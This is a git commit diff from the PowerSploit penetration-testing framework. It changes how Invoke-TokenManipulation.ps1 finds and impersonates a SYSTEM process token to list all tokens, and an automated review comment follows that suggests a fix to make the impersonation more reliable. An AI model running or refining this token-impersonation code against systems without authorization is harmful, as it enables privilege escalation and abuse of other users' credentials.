authorPowerShellMafia <PowerShellMafia@users.noreply.github.com>2015-12-18 16:33:59 -0800
committerPowerShellMafia <PowerShellMafia@users.noreply.github.com>2015-12-18 16:33:59 -0800
commit9e771d15bf19ab3c2ac196393c088ecdab6c9a73 (patch)
tree58927893ecb9289ad1de64d3a67eb58d00e4b762 /Exfiltration/Invoke-TokenManipulation.ps1
parent9f78286ea7b0ec65d2aa09893a076864dd8d14e9 (diff)
parent9f183e36518176c4299eed5c68b7deac7f4e8025 (diff)
Merge pull request #102 from PowerShellMafia/devv3.0.0
Merge 3.0 release changes
Diffstat (limited to 'Exfiltration/Invoke-TokenManipulation.ps1')
-rw-r--r--Exfiltration/Invoke-TokenManipulation.ps111
1 files changed, 7 insertions, 4 deletions
diff --git a/Exfiltration/Invoke-TokenManipulation.ps1 b/Exfiltration/Invoke-TokenManipulation.ps1
index 7bfce3b..3a61da8 100644
--- a/Exfiltration/Invoke-TokenManipulation.ps1
+++ b/Exfiltration/Invoke-TokenManipulation.ps1
@@ -49,8 +49,6 @@ Author: Joe Bialek, Twitter: @JosephBialek
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
-Version: 1.11
-(1.1 -> 1.11: PassThru of System.Diagnostics.Process object added by Rune Mariboe, https://www.linkedin.com/in/runemariboe)
.DESCRIPTION
@@ -1685,8 +1683,13 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke
$AllTokens = @()
#First GetSystem. The script cannot enumerate all tokens unless it is system for some reason. Luckily it can impersonate a system token.
- #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges, so impersonate the wininit token.
- $systemTokenInfo = Get-PrimaryToken -ProcessId (Get-Process wininit | where {$_.SessionId -eq 0}).Id
+ #Even if already running as system, later parts on the script depend on having a SYSTEM token with most privileges.
+ #We need to enumrate all processes running as SYSTEM and find one that we can use.
+ $SystemTokens = Get-Process -IncludeUserName | Where {$_.Username -eq "NT AUTHORITY\SYSTEM"}
+ ForEach ($SystemToken in $SystemTokens)
+ {
+ $SystemTokenInfo = Get-PrimaryToken -ProcessId $SystemToken.Id -WarningAction SilentlyContinue -ErrorAction SilentlyContinue
+ }
if ($systemTokenInfo -eq $null -or (-not (Invoke-ImpersonateUser -hToken $systemTokenInfo.hProcToken)))
{
Write-Warning "Unable to impersonate SYSTEM, the script will not be able to enumerate all tokens"
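Review bot: The ForEach over $SystemTokens never exits early, so $SystemTokenInfo ends up holding whatever the last SYSTEM process yielded, and a later Get-PrimaryToken that returns nothing (errors are silenced by -ErrorAction SilentlyContinue, so a process the caller cannot open presumably just yields $null) overwrites an earlier usable token and the script falls into the "Unable to impersonate SYSTEM" branch despite having had one. The comment above the loop says "find one that we can use", which suggests the intent was to stop on the first success; add `if ($SystemTokenInfo -ne $null) { break }` after the Get-PrimaryToken line. If Get-PrimaryToken hands back an open process/token handle, the overwritten results are also leaked handles, so stopping at the first hit avoids that too, though that depends on its implementation, which is outside this hunk. Separately, Get-Process -IncludeUserName requires PowerShell 4.0 and an elevated session, and without elevation $_.Username is empty and the filter matches nothing; a comment stating that requirement, e.g. `# -IncludeUserName needs PS 4.0+ and an elevated session; otherwise no SYSTEM processes are matched`, would make the failure mode clear. The enclosing function continues past the hunk.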